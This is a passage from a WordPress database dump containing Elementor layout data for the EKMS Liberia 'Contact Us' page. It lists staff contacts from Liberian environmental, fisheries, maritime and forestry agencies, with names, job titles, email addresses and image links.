\\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23998,3516,'_elementor_edit_mode','builder'),(23999,3516,'_elementor_template_type','wp-page'),(24000,3516,'_elementor_version','3.0.16'),(24001,3516,'_wp_page_template','default'),(24002,3516,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a 